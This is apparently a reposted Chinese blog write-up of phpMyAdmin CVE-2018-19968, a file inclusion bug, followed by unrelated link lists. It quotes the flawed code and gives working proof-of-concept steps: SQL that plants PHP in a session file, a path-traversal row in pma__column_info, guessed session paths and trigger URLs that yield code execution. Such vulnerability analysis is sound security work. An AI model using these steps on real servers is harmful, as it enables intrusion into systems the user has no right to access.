PHPMyAdmin 4.0.0~4.8.3 任意文件包含/远程代码执行漏洞

介绍

本地文件包含（CVE-2018-19968） -至少从4.0.0到4.8.3的phpMyAdmin版本就有一个本地文件包含漏洞，可允许远程攻击者通过转换功能从服务器上的本地文件中获取敏感内容，并且可Getshell。

phpMyAdmin各版本下载地址：

https://www.phpmyadmin.net/files/

攻击条件

攻击者必须能够访问phpMyAdmin配置存储表，尽管可以在攻击者访问的任何数据库中轻松创建这些表。但攻击者必须拥有有效的凭据才能登录phpMyAdmin，所以此漏洞不允许攻击者绕过登录系统。

漏洞细节

Transformation是phpMyAdmin中的一个高级功能，通过Transformation可以对每个字段的内容使用不同的转换，每个字段中的内容将被预定义的规则所转换。比如我们有一个存有文件名的字段 ‘Filename’，正常情况下 phpMyAdmin 只会将路径显示出来。但是通过Transformation我们可以将该字段转换成超链接，我们就能直接在 phpMyAdmin 中点击并在浏览器的新窗口中看到这个文件。

通常情况下Transformation的规则存储在每个数据库的pma__column_info表中，而在phpMyAdmin 4.0.0~4.8.3版本中，由于对转换参数处理不当，导致了任意文件包含漏洞的出现。
在tbl_replace.php文件中

// Apply Input Transformation if defined

if (!empty($mime_map[$column_name])

&& !empty($mime_map[$column_name]['input_transformation'])

) {

   $filename = 'libraries/classes/Plugins/Transformations/'

. $mime_map[$column_name]['input_transformation'];

   if (is_file($filename)) {

      include_once $filename;

      $classname = Transformations::getClassName($filename);

      /** @var IOTransformationsPlugin $transformation_plugin */

      $transformation_plugin = new $classname();

      $transformation_options = Transformations::getOptions(

         $mime_map[$column_name]['input_transformation_options']

      );

      $current_value = $transformation_plugin->applyTransformation(

         $current_value, $transformation_options

      );

      // check if transformation was successful or not

      // and accordingly set error messages & insert_fail

      if (method_exists($transformation_plugin, 'isSuccess')

&& !$transformation_plugin->isSuccess()

) {

         $insert_fail = true;

         $row_skipped = true;

         $insert_errors[] = sprintf(

            __('Row: %1$s, Column: %2$s, Error: %3$s'),

            $rownumber, $column_name,

            $transformation_plugin->getError()

         );

      }

   }

}

拼接到$filename的变量filename的变量mime_map[$column_name][‘input_transformation’]来自于数据表pma__column_info中的input_transformation字段，因为数据库中的内容用户可控，从而产生了任意文件包含漏洞。

利用

这里用本地的phpstudy环境来测试，pma的版本为phpMyAdmin-4.5.4.1。

登录后执行sql命令：

CREATE DATABASE foo;

CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );

INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';

再访问

http://127.0.0.1/phpMyAdmin-4.5.4.1/chk_rel.php?fixall_pmadb=1&db=foo

在数据库foo中生成phpMyAdmin的配置表：
有时会报错警告

点Create创建就行

然后将篡改后的Transformation数据插入表pma__column_info中：
将sess_ID中的ID替换成你的会话ID，即COOKIE中phpMyAdmin的值

然后在foo库中执行sql语句：

INSERT INTO `pma__column_info`SELECT '1', 'foo', 'bar', 'baz', 'plop',

'plop', 'plop', 'plop',

'../../../../../../../../phpstudy/PHPTutorial/tmp/tmp/sess_ID','plop';

sessionID文件常见路径：

在Linux下，常见的文件路径为： /var/lib/php/session/或/tmp/
在Windows下：
默认为c:/windows/temp/
phpstudy集成软件环境下，文件路径为：/phpstudy/PHPTutorial/tmp/tmp/
Wamp集成软件环境下，文件路径为：/wamp64/tmp/
因为环境搭建方式的不同，session文件的路径也会不同(通过修改php.ini中的session.save_path值可以改变session的保存路径)，并且对于攻击者session文件的绝对路径也是不能直接获取到的，只能靠常见路径或猜路径去利用。

可以看到在pma的pma__column_info里已经写入了数据

再访问

http://127.0.0.1/phpMyAdmin-4.5.4.1/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1&token=66ee4fd9e462c2b17ed284a6b02a0c4b

会成功执行sessionID文件，包含成功。

经测试发现此漏洞在phpMyAdmin-4.7.0-beta1版本和更高版本执行恶意代码文件，不用在url中加入token，否则可能包含不成功。

CVE-2018-19968的更多相关文章

1. 深入剖析最新IE0day漏洞

   在2018年4月下旬,我们使用沙箱发现了IE0day漏洞;自从在野外发现上一个样本(CVE-2016-0189)已经有两年多了.从许多方面来看,这个特别的漏洞及其后续的开发比较有趣.下一篇文章将分析最 ...

2. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

   2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

3. Debian Security Advisory(Debian安全报告) DSA-4405-1 openjpeg2

   package :openjpeg2 相关CVE ID: CVE-2017-17480 CVE-2018-5785 CVE-2018-6616 CVE-2018-14423 CVE-2018-1808 ...

4. 2018-2019-2 20165330《网络对抗技术》Exp5 MSF基础应用

   目录 基础问题 相关知识 实验目的 实验内容 实验步骤 离实战还缺些什么技术或步骤? 实验总结与体会 实验目的 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路 返回目 ...

5. 2018-2019-2 网络对抗技术 20165230 Exp5 MSF基础应用

   目录 1.实验内容 2.基础问题回答 3.实验内容 任务一:一个主动攻击实践 漏洞MS08_067(成功) 任务二:一个针对浏览器的攻击 ms11_050(成功) ms14_064(成功) 任务三:一 ...

6. Linux提权常用漏洞速查表

   漏洞列表 #CVE #Description #Kernels CVE–2018–18955 [map_write() in kernel/user_namespace.c allows privil ...

7. 【转帖】2018年Windows漏洞年度盘点

   2018年Windows漏洞年度盘点丨老漏洞经久不衰,新0day层出不穷 腾讯电脑管家2019-02-12共17875人围观 ,发现 1 个不明物体网络安全资讯 https://www.freebuf ...

8. Gartner 2018 年WAF魔力象限报告：云WAF持续增长，Bot管理与API安全拥有未来

   Gartner 2018 年WAF魔力象限报告:云WAF持续增长,Bot管理与API安全拥有未来 来源 https://www.freebuf.com/articles/paper/184903.ht ...

9. 2017年总结&2018年计划

   谈一谈2017年计划: 1.完成壁咚项目2.写一个自己的扫描器3.完善web安全手册.4.搞一个大漏洞或CVE的漏洞 完成进度:1.壁咚这个项目,当初发誓要用java来写完,其实最开始就已经写完了,前 ...

10. CVE漏洞分析

    分析cve-2018-9489漏洞和download content provider(CVE-2018-9468, CVE-2018-9493, CVE-2018-9546), 每人至少选择一个漏洞 ...

随机推荐

1. 墨刀 手机app原型工具

   https://modao.io 并且墨刀对开放项目永久免费!

2. Cookie[1]

   1.什么是Cookie Cookie是一小段文本类型的数据,由服务器发送,并保留在客户端的计算机上. 2.Cookie的作用 服务器可以利用Cookie包含的信息来筛选并经常维护这些信息,以判断在Ht ...

3. 为什么报错说req未定义，createServer只接受匿名函数吗？

   var http = require('http');var server = new http.createServer(handlerRequest(req,res));server.listen ...

4. 手动整合实现SSH项目开发01

   内容简介:本文主要介绍SSH项目开发的配置以及简单登录功能的实现. 1. 新建一个Dynamic Web Project. 2.导入需要 的Jar包,此项目是Struts.Hibernate.Spri ...

5. rsync远程数据同步工具的使用

   准备工作 虚拟机1: 192.168.24.41, 用于搭建rsync服务器 虚拟机2: 192.168.26.68, 用于搭建rsync客户端 虚拟机1和虚拟机2均为centos7; 1. 检查虚拟 ...

6. 洛谷 P2341 [HAOI2006]受欢迎的牛 解题报告

   P2341 [HAOI2006]受欢迎的牛 题目描述 每头奶牛都梦想成为牛棚里的明星.被所有奶牛喜欢的奶牛就是一头明星奶牛.所有奶 牛都是自恋狂,每头奶牛总是喜欢自己的.奶牛之间的"喜欢&q ...

7. Vue.js学习笔记之修饰符详解

   本篇将简单介绍常用的修饰符. 在上一篇中,介绍了 v-model 和 v-on 简单用法.除了常规用法,这些指令也支持特殊方式绑定方法,以修饰符的方式实现.通常都是在指令后面用小数点“.”连接修饰符名 ...

8. LOJ #2141. 「SHOI2017」期末考试

   题目链接 LOJ #2141 题解 据说这道题可以三分(甚至二分)? 反正我是枚举的 = = 先将t和b数组排序后计算出前缀和, 然后枚举最晚的出成绩时间,每次可以O(1)直接计算调整到该时间所需的代 ...

9. oracle like 条件拼接

   (1) ibatis xml配置:下面的写法只是简单的转义 namelike '%$name$%' (2) 这时会导致sql注入问题,比如参数name传进一个单引号“'”,生成的sql语句会是:nam ...

10. 带你走进Linux（Ubuntu）

    类Unix系统目录结构 ubuntu没有盘符这个概念,只有一个根目录/,所有文件都在它下面 /:根目录,一般根目录下只存放目录,在Linux下有且只有一个根目录.所有的东西都是从这里开始.当你在终端里 ...